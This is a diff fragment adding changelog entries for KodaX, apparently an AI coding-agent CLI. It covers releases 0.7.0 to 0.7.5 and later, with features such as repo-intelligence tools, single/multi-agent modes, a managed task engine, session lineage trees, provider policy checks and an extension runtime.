+ - **Core docs refreshed**: HLD, DD, ADR, PRD, feature designs, and roadmap notes now match the current SA/AMA/skill architecture
1113
+
1114
+ ### Fixed
1115
+ - Interrupted managed tasks now filter empty/control-plane placeholder evidence from transcript rendering and queue the last visible response for background persistence
1116
+ - Mixed lookup/actionable prompts no longer short-circuit onto the pure lookup path
1117
+ - H1 revise no longer auto-escalates on the first evaluator retry
1118
+ - H1 read-only Generator now receives both runtime write guards and explicit prompt guidance to stay non-mutating
1119
+ - Scout downshifts now complete as Scout-owned `H0_DIRECT` runs instead of handing off to a second direct agent or leaking scout-flavored output
1120
+
1121
+ ### Tests
1122
+ - Added / expanded tests for `task-engine`, `reasoning`, `tool-display`, `live-streaming`, `StatusBar`, `invocation-runtime`, `types-legacy`, and `InkREPL.interrupted`
1123
+
1124
+ <!-- last-sync: HEAD -->
1125
+
1126
+ ### Added
1127
+ - **Repository intelligence substrate (FEATURE_018)**: Task-aware repository intelligence layer under `.agent/repo-intelligence/` with durable artifacts — `repo-overview.json`, `changed-scope.json`, `module-index.json`, `symbol-index.json`, `process-index.json`, `repo-intelligence-manifest.json` — supporting incremental refresh, freshness metadata, and language-tiered extraction (TS/JS via AST, Python, Go, Rust, Java, C++)
1128
+ - **Intelligence query surfaces**: Six first-class retrieval tools — `repo_overview`, `module_context`, `symbol_context`, `process_context`, `impact_estimate`, `changed_scope` — returning structured capsules with freshness, confidence, evidence, and progressive disclosure (FEATURE_028)
1129
+ - **Repo-intelligence tools**: `repo-overview.ts`, `module-context.ts`, `symbol-context.ts`, `process-context.ts`, `impact-estimate.ts`, `changed-scope.ts`, `internal.ts`, and `query.ts` in `packages/coding/src/tools/` and `packages/coding/src/repo-intelligence/`
1130
+ - **Adaptive multi-agent mode toggle (FEATURE_027)**: Persistent `agentMode` setting (`sa`/`ama`) with CLI (`--agent-mode`), REPL (`/agent-mode`), and keyboard shortcut (`Alt+M`) entry points; status bar shows `KodaX - SA` or `KodaX - AMA`
1131
+ - **SA mode execution constraint**: Single-Agent mode clamps execution to single-agent path while preserving task routing, metadata, and managed-task artifacts — reducing token cost
1132
+ - **`--team` deprecation**: `--team` removed from main product surface, retained as deprecated compatibility path that warns and refuses execution
1133
+ - **Agent mode shortcut**: `Alt+M` default shortcut for runtime SA/AMA toggle with command fallback
1134
+ - **Prompt-time intelligence injection**: Automatic active-module and active-impact injection for edit/review/refactor flows via `buildPromptOverlay()`
1135
+ - **Routing enrichment**: `stabilizeRoutingDecision()` now consumes lightweight repo-intelligence signals to raise complexity, bias planning, and choose safer harness profiles
1136
+ - **Task evidence snapshots**: Managed tasks persist task-scoped retrieval snapshots (repo overview, changed scope, active module, impact) into evidence bundles
1137
+ - **New types**: Intelligence capsule types, confidence tiers, freshness metadata, language capability tiers in `@kodax/coding` and `@kodax/ai`
1138
+ - **New tests**: Repo-intelligence tool tests, reasoning tests for intelligence-aware routing, agent mode tests, status bar mode display tests, shortcut tests
1139
+
1140
+ ### Changed
1141
+ - **CLI entry points**: `kodax_cli.ts` updated for `--agent-mode` flag and deprecated `--team` handling
1142
+ - **Reasoning pipeline expanded**: `reasoning.ts` (+495 lines) enriched with repo-intelligence signals, language-tiered extraction, and low-confidence fallback guidance
1143
+ - **Task engine expanded**: `task-engine.ts` (+2645 lines) with intelligence query integration, evidence snapshot persistence, and managed-task lifecycle enrichment
1144
+ - **Orchestration updated**: `orchestration.ts` refactored for intelligence-aware task dispatch and SA mode constraint propagation
1145
+ - **REPL UI updated**: `InkREPL.tsx` gains agent mode display, mode toggle handling, and mode-aware rendering; `StatusBar` shows current agent mode
1146
+ - **Session storage**: `storage.ts` gains `agentMode` persistence in session metadata
1147
+ - **Provider registry**: Provider capability checks updated for intelligence-query-aware policy evaluation
1148
+ - **Documentation**: v0.7.0, v0.8.0, v0.9.0 feature docs, FEATURE_LIST, KNOWN_ISSUES, and feature README updated for 018/027/028
1149
+
1150
+ ---
1151
+
1152
+ ## [0.7.5] - 2026-03-26
1153
+
1154
+ ### Added
1155
+ - **Task engine (FEATURE_022)**: `runManagedTask()` in `packages/coding/src/task-engine.ts` — full managed task lifecycle with contract creation, role assignment, evidence collection, and orchestration verdict; integrates with `runOrchestration` for multi-worker task execution
1156
+ - **Task contract types**: `KodaXTaskContract`, `KodaXTaskRoleAssignment`, `KodaXTaskWorkItem`, `KodaXTaskEvidenceArtifact`, `KodaXTaskEvidenceEntry`, `KodaXTaskEvidenceBundle`, `KodaXOrchestrationVerdict`, `KodaXManagedTask` in `@kodax/coding`
1157
+ - **Task context types**: `KodaXTaskCapabilityHint`, `KodaXTaskVerificationContract`, `KodaXTaskToolPolicy` for structured verification and tool policy contracts
1158
+ - **Task surface tracking**: `KodaXTaskSurface` type (`cli`/`repl`/`project`/`plan`) propagated through execution context to identify managed task entry points
1159
+ - **Session scope**: `KodaXSessionScope` (`user`/`managed-task-worker`) on `KodaXSessionData` and `KodaXSessionMeta` for worker session identification; `scope` option on `KodaXSessionOptions`
1160
+ - **Project control state**: `ProjectControlState` interface and `createProjectControlState()` factory for tracking workflow mutations separately from derived workflow state
1161
+ - **Managed task persistence**: `ProjectStorage` read/write for managed task artifacts (`managed-task.json`) and control state (`control-state.json`)
1162
+ - **JSON guards**: Type guards for `ProjectControlState`, `KodaXManagedTask`, `KodaXTaskVerificationContract`, `KodaXTaskToolPolicy`, `KodaXTaskCapabilityHint` in `json-guards.ts`
1163
+ - **Orchestration abort propagation**: `AbortSignal` threading from `runOrchestration` options through task runners to agent execution; `mergeAbortSignals()` utility for composite abort handling with `AbortSignal.any` fallback
1164
+ - **Orchestration task cancellation**: `buildCancelledTaskResult()` and early-exit loop when external abort signal fires, marking all pending tasks as blocked
1165
+ - **Task runner hooks**: `createOptions` and `onResult` callbacks on `CreateKodaXTaskRunnerOptions` for per-task option customization and post-result side effects
1166
+ - **New tests**: Task engine integration tests, orchestration abort tests, project storage managed task tests, project harness control state tests, storage scope tests, CLI option helper tests
1167
+
1168
+ ### Changed
1169
+ - **CLI entry points use `runManagedTask`**: `kodax_cli.ts` replaced `runKodaX` with `runManagedTask` for all execution paths (direct, command, print) with `taskSurface: 'cli'`
1170
+ - **Project commands use `runManagedTask`**: `/project next` and `/project auto` now execute via `runManagedTask` with project surface, feature metadata, and verification contracts
1171
+ - **Workflow state derivation refactored**: `ProjectStorage.inferWorkflowState` replaced with `deriveWorkflowState` that considers control state, alignment truth, and managed task status for more accurate stage inference
1172
+ - **Project harness verification integration**: Verification results now map to managed task verdict (`completed`/`blocked`) and update evidence entries with signals
1173
+ - **Control state propagated**: Discovery, planning, and execution commands now use `saveProjectControlState` instead of directly mutating workflow state
1174
+
1175
+ ### Documentation
1176
+ - **ADR, DD, HLD, PRD**: Updated architecture decision records, design document, high-level design, and product requirements for FEATURE_022 task engine
1177
+ - **Feature design docs**: v0.7.0, v0.8.0, v0.9.0, v1.0.0 feature documents updated for task engine integration and dependency tracking
1178
+ - **FEATURE_LIST.md**: Updated with FEATURE_022 progress and cross-feature dependency references
1179
+
1180
+ ---
1181
+
1182
+ ## [0.7.4] - 2026-03-26
1183
+
1184
+ ### Added
1185
+ - **Task complexity inference (FEATURE_025)**: Weighted keyword scoring across 4 tiers — `simple`, `moderate`, `complex`, `systemic` — with language-aware Chinese and English keyword sets; cross-referenced with task type, risk level, and work intent for calibrated results
1186
+ - **Work intent detection**: `inferWorkIntent()` classifies requests as `append`, `overwrite`, or `new` based on explicit keyword signals; destructive interpretation preferred when append and rewrite language conflict
1187
+ - **Brainstorm trigger**: `inferRequiresBrainstorm()` detects ambiguity that warrants option framing — triggered by brainstorm keywords, low-confidence unknown tasks, systemic complexity, or high-risk overwrites
1188
+ - **Harness profile selection**: `selectHarnessProfile()` maps routing decisions to 4 execution profiles (`H0_DIRECT`, `H1_EXECUTE_EVAL`, `H2_PLAN_EXECUTE_EVAL`, `H3_MULTI_WORKER`) based on task characteristics; automatically downgrades to H1/H2 on lossy bridge providers with recorded routing notes
1189
+ - **Harness profile prompt overlays**: Dedicated system prompt fragments for each harness profile that guide the LLM's execution strategy
1190
+ - **Tied task resolution**: `resolveTiedTask()` breaks score ties by checking for explicit directive keywords (review, fix, plan) in the prompt, falling back to `unknown` when no clear winner exists
1191
+ - **Provider policy hints for decisions**: `buildProviderPolicyHintsForDecision()` converts a routing decision into policy hints — `harnessProfile`, `evidenceHeavy`, `brainstorm`, `workIntent` — threaded through execution context for downstream policy evaluation
1192
+ - **Harness-aware provider policy rules**: New block/warn rules for `H3_MULTI_WORKER` (blocked on lossy/stateless providers, warned on limited) and `H2_PLAN_EXECUTE_EVAL` (warned on bridge/lossy providers)
1193
+ - **Routing decision on KodaXResult**: `routingDecision` field on `KodaXResult` exposes the final visible routing decision including harness profile and work intent to callers
1194
+ - **Extended KodaXProviderPolicyHints**: New `harnessProfile`, `brainstorm`, and `workIntent` fields for context-aware policy evaluation
1195
+ - **New types**: `KodaXTaskComplexity`, `KodaXTaskWorkIntent`, `KodaXHarnessProfile` in `@kodax/ai`; re-exported through `@kodax/agent` and `@kodax/coding`
1196
+ - **Extended routing decision**: `KodaXTaskRoutingDecision` gains `complexity`, `workIntent`, `requiresBrainstorm`, `harnessProfile`, and optional `routingNotes` fields
1197
+ - **New tests**: 10 new reasoning tests (append/overwrite intent, brainstorm triggers, complexity tiers, H3 harness selection, provider downgrade, policy hints, tied task resolution), 2 new provider-policy tests (H3 block, H2 warn), expanded agent policy integration tests
1198
+
1199
+ ### Changed
1200
+ - **`stabilizeRoutingDecision` enriched**: Now runs full inference pipeline — work intent, complexity, brainstorm, harness profile — on every routing decision (fallback and LLM-routed) instead of only handling edge cases
1201
+ - **Prompt overlay expanded**: `buildPromptOverlay()` now includes harness profile, work intent guidance, brainstorm trigger, and routing notes alongside the existing execution mode and task routing fields
1202
+ - **Auto-reroute preserves enriched decision**: `maybeCreateAutoReroutePlan()` threads provider policy through `stabilizeRoutingDecision` so enriched fields are recalculated on reroute
1203
+ - **Policy evaluation context passed to streaming**: `evaluateProviderPolicy` call in agent loop now receives `effectiveOptions` and `context` separately for accurate hint resolution
1204
+ - **Agent loop threads routing decision to result**: All exit paths in `runKodaX` (success, error, cancel, yield, limit) now include `routingDecision` on the result
1205
+ - **Provider policy hints threaded through execution context**: `buildReasoningExecutionState` injects `buildProviderPolicyHintsForDecision` into context's `providerPolicyHints` so downstream calls see the routing-derived hints
1206
+ - **Router system prompt expanded**: LLM task router now accepts and validates `complexity`, `workIntent`, `harnessProfile`, `requiresBrainstorm`, and `routingNotes` fields
1207
+
1208
+ ---
1209
+
1210
+ ## [0.7.3] - 2026-03-26
1211
+
1212
+ ### Changed
1213
+ - **Message fingerprint caching**: `messagesEqual()` now uses a `WeakMap`-based fingerprint cache to avoid repeated `JSON.stringify` during lineage reconciliation, reducing deduplication cost for repeated calls
1214
+ - **Fork session ID generation**: `MemorySessionStorage.fork()` uses `generateSessionId()` from `@kodax/coding` instead of a timestamp-based fallback for consistent session ID format
1215
+ - **Guard reporter extraction**: Duplicated session transition guard callback in `InkREPL.tsx` extracted into shared `logSessionTransitionGuard()` helper
1216
+
1217
+ ### Added
1218
+ - **API documentation**: JSDoc comments added to all exported session lineage functions (`createSessionLineage`, `getSessionLineagePath`, `getSessionMessagesFromLineage`, `resolveSessionLineageTarget`, `setSessionLineageActiveEntry`, `appendSessionLineageLabel`, `forkSessionLineage`, `buildSessionTree`, `countActiveLineageMessages`)
1219
+ - **New session lineage tests**: Empty lineage edge case, fork from active leaf without selector, skip branch summaries when `summarizeCurrentBranch` is disabled, missing selector null returns, orphaned entries rendered as separate roots
1220
+
1221
+ ---
1222
+
1223
+ ## [0.7.2] - 2026-03-26
1224
+
1225
+ ### Added
1226
+ - **Session lineage tree (FEATURE_019)**: `packages/agent/src/session-lineage.ts` — branchable session history with parent-child entry relationships, automatic deduplication, and immutable data structures; supports four entry types: `message`, `compaction`, `branch_summary`, and `label`
1227
+ - **Session tree visualization**: `formatSessionTree()` renders the lineage as a tree with branch indicators, active-path markers, entry IDs, and optional checkpoint labels
1228
+ - **Branch-and-continue navigation**: `setSessionLineageActiveEntry()` navigates to any tree node by entry ID or label; automatically summarizes abandoned branches into `branch_summary` entries for context preservation
1229
+ - **Checkpoint labels**: `appendSessionLineageLabel()` attaches lightweight bookmark labels to any tree node; resolved via `getResolvedLabels()` with last-wins semantics and support for clearing labels
1230
+ - **Session forking**: `forkSessionLineage()` deep-clones a branch path into an independent lineage with new entry IDs and preserved labels, enabling parallel exploration without mutating the source session
1231
+ - **`/tree` REPL command**: Inspect, navigate, and label session branches — `/tree` displays the tree, `/tree <selector>` jumps to a node, `/tree label` and `/tree unlabel` manage checkpoint labels
1232
+ - **`/fork` REPL command**: Export a branch into a new independent session file, optionally from a specific tree node
1233
+ - **Session transition guardrails**: `evaluateSessionTransitionPolicy()` checks provider capability (session support) before session load, branch switch, or fork operations; blocks operations on stateless providers, warns on limited support
1234
+ - **Extended `KodaXSessionStorage` interface**: New optional methods `getLineage`, `setActiveEntry`, `setLabel`, and `fork` for storage backends to support lineage operations
1235
+ - **Session data model additions**: `KodaXSessionLineage`, `KodaXSessionEntry` (4 variants), `KodaXSessionNavigationOptions`, `KodaXSessionTreeNode` types; `KodaXSessionData` gains optional `lineage` field; `KodaXSessionMeta` gains lineage metadata fields
1236
+ - **Lineage-aware JSONL persistence**: `storage.ts` reads and writes `lineage_entry` records alongside `meta` and `extension_record` lines; backward-compatible migration from legacy flat message arrays via `createSessionLineage()`
1237
+ - **Lineage-aware session storage utilities**: `session-storage.ts` (Ink) and `MemorySessionStorage` (readline) both support lineage operations with `structuredClone` for immutability
1238
+ - **Lineage-aware session listing**: `list()` reports active branch message count via `countActiveLineageMessages()` when lineage is present
1239
+ - **Lineage storage helpers in project-harness**: `readLineageCheckpoints`, `readLineageSessionNodes`, `appendLineageCheckpoint`, `appendLineageSessionNode` with backward-compatible aliases
1240
+ - **Project harness record schema additions**: `ProjectHarnessCheckpointRecord` and `ProjectHarnessSessionNodeRecord` gain `id` and `taskId` fields for lineage tracking
1241
+ - **New tests**: `session-lineage.test.ts`, `session-tree-command.test.ts`, `session-guardrails.test.ts`, expanded `storage.test.ts`
1242
+
1243
+ ### Changed
1244
+ - **`loadSession` callback returns typed status**: `Promise<boolean>` replaced with `Promise<SessionLoadStatus>` (`loaded`/`missing`/`blocked`) to distinguish missing sessions from provider-guarded blocks
1245
+ - **`deleteAll` scoped by git root**: `deleteAll()` now accepts optional `gitRoot` parameter for project-scoped session cleanup
1246
+ - **Session save preserves extension state**: Both storage backends merge existing `extensionState` and `extensionRecords` on save for incremental updates
1247
+ - **Session load returns cloned data**: `load()` now returns `structuredClone` to prevent accidental mutation of cached session state
1248
+ - **Project harness persistence method rename**: Internal storage methods migrated to lineage-aware naming; old names kept as backward-compatible aliases
1249
+
1250
+ ---
1251
+
1252
+ ## [0.7.1] - 2026-03-26
1253
+
1254
+ ### Added
1255
+ - **Provider capability dimensions (FEATURE_029)**: Six new typed capability dimensions — `contextFidelity`, `toolCallingFidelity`, `sessionSupport`, `longRunningSupport`, `multimodalSupport`, `evidenceSupport` — added to `KodaXProviderCapabilityProfile` in `@kodax/ai`
1256
+ - **Normalized capability profile**: `NormalizedKodaXProviderCapabilityProfile` type and `normalizeCapabilityProfile()` function ensuring all capability fields have explicit values with sensible defaults
1257
+ - **Provider policy engine**: `packages/coding/src/provider-policy.ts` — `evaluateProviderPolicy()` evaluates provider constraints against task context (multimodal, MCP, long-running, project-harness, evidence-heavy, reasoning-control scenarios) and returns `block`/`warn`/`allow` decisions with routing notes
1258
+ - **Policy-aware routing**: Provider policy wired into `createReasoningPlan()` and `buildPromptOverlay()` — routing prompts now include provider constraint notes; `buildRepositoryRoutingSummary` includes provider semantics for LLM routing decisions
1259
+ - **Agent loop policy enforcement**: `evaluateProviderPolicy()` called in `runKodaX()` before streaming; `block` decisions throw errors, `warn` decisions append notes to system prompt
1260
+ - **`/provider` REPL command**: Inspect provider capability matrix and common policy scenarios with color-coded block/warn/allow indicators; supports `/provider <name>[/<model>]` syntax
1261
+ - **Provider capability snapshot helpers**: `getProviderCapabilitySnapshot`, `formatProviderCapabilityDetailLines`, `formatProviderSourceKind`, `getProviderCommonPolicyScenarios`, `getProviderPolicyDecision` in `@kodax/repl`
1262
+ - **Provider policy types**: `KodaXProviderPolicyDecision`, `KodaXProviderPolicyIssue`, `KodaXProviderPolicyHint`, `KodaXProviderSourceKind` types in `@kodax/coding`
1263
+ - **New tests**: `provider-policy.test.ts`, `agent.provider-policy.test.ts`, expanded `provider-capabilities.test.ts`; updated existing provider tests for 6 new capability fields
1264
+
1265
+ ### Changed
1266
+ - **Capability profiles expanded**: Native providers declare `full` across all 6 new dimensions; CLI bridge providers declare `lossy`/`limited`/`stateless` as appropriate
1267
+ - **`cloneCapabilityProfile` normalized**: Now returns profile with all capability fields populated via `normalizeCapabilityProfile`
1268
+ - **Existing provider tests updated**: `acp-base`, `capability-profile`, `cli-bridge-providers`, `custom-providers` tests updated for 6 new profile fields
1269
+
1270
+ ### Documentation
1271
+ - **FEATURE_034 design doc**: Capability profile section updated with 6 new dimensions
1272
+ - **FEATURE_LIST.md**: Updated to reflect FEATURE_029 completion
1273
+
1274
+ ---
1275
+
1276
+ ## [0.7.0] - 2026-03-25
1277
+
1278
+ ### Added
1279
+ - **Extension Runtime (FEATURE_034)**: Headless programmable runtime with four layers — Extension Runtime (loading, lifecycle, hot reload, provenance), Capability Runtime (discovery, execution, structured result transport), Runtime Control Surface (session state, queued follow-ups, active tools, model/thinking overrides), and Host Adapters (CLI `--extension`, config-based loading, REPL commands)
1280
+ - **Extension API**: `registerTool`, `registerCapabilityProvider`, `registerModelProvider`, `registerCommand`, `registerSkillPath`, typed `on(event)`, explicit `hook(...)` for `session:hydrate`, `provider:before`, `tool:before`, `turn:settle`
1281
+ - **Definition-first tool registry**: Tools registered through atomic `LocalToolDefinition` with schema-derived required params; same-name tool override with provenance tracking; removed `KODAX_TOOL_REQUIRED_PARAMS` parallel truth source
1282
+ - **Runtime model provider registry**: Dynamic model provider registration in `@kodax/ai` with same-name override and `registerModelProvider` API
1283
+ - **Extension persistence store**: JSONL-backed key-value store in `@kodax/agent` for extension session state, scoped per extension identity with versioned entries
1284
+ - **Extension commands in REPL**: `/extensions` command to list loaded extensions and `/reload` command to hot-reload extensions
1285
+ - **`--extension` CLI flag**: Load extensions from CLI invocation
1286
+ - **Extension command registration**: Extensions can register custom REPL commands via `registerCommand`
1287
+ - **JSON mode type guards**: `JsonEventsLogger` and `JsonEventEmitter` type guards for structured event streaming
1288
+ - **Extension types in `@kodax/agent`**: `KodaXExtensionSessionRecord`, `KodaXExtensionSessionState`, `KodaXExtensionStore`, `KodaXJsonValue` types
1289
+ - **New tests**: extension runtime, agent extension integration, persistence store, tool registry, REPL extension commands, storage, autocomplete extension paths, CLI option helpers
1290
+
1291
+ ### Changed
1292
+ - **Agent loop extension integration**: Extension runtime wired into `agent.ts` at `session:hydrate`, `provider:before`, `tool:before`, and `turn:settle` hook points
1293
+ - **Tool registry rewritten**: Multi-registration per tool name with active-selection semantics, `getRegisteredToolDefinition`, `getBuiltinRegisteredToolDefinition`, `listToolDefinitions` exported API
1294
+ - **REPL commands refactored**: Chinese comments converted to English; extension-aware command dispatch; `getActiveExtensionRuntime` and `emitActiveExtensionEvent` wired into REPL commands
1295
+ - **Storage module enhanced**: Extension session state and records persistence integrated into session storage
1296
+ - **`@kodax/coding` public API expanded**: Extension runtime exports, capability types, tool definition types, extension store API
1297
+ - **`@kodax/agent` public API expanded**: Extension store factory, extension types
1298
+ - **`@kodax/ai` public API expanded**: Runtime model provider registration and resolver integration
1299
+ - **`@kodax/skills` public API expanded**: `registerPluginSkillPath` for extension skill path registration
1300
+ - **v0.7.0 feature design updated**: FEATURE_034 marked as Completed; roadmap dependency documentation finalized
1301
+
1302
+ ### Documentation
1303
+ - **Design document restructure**: Major cleanup of v0.7.0 feature design doc, removing redundant historical drafts while preserving key implementation decisions
1304
+ - **Feature boundary documentation**: Updated boundary sections for 034 across dependent features (019, 022, 029, 035, 038)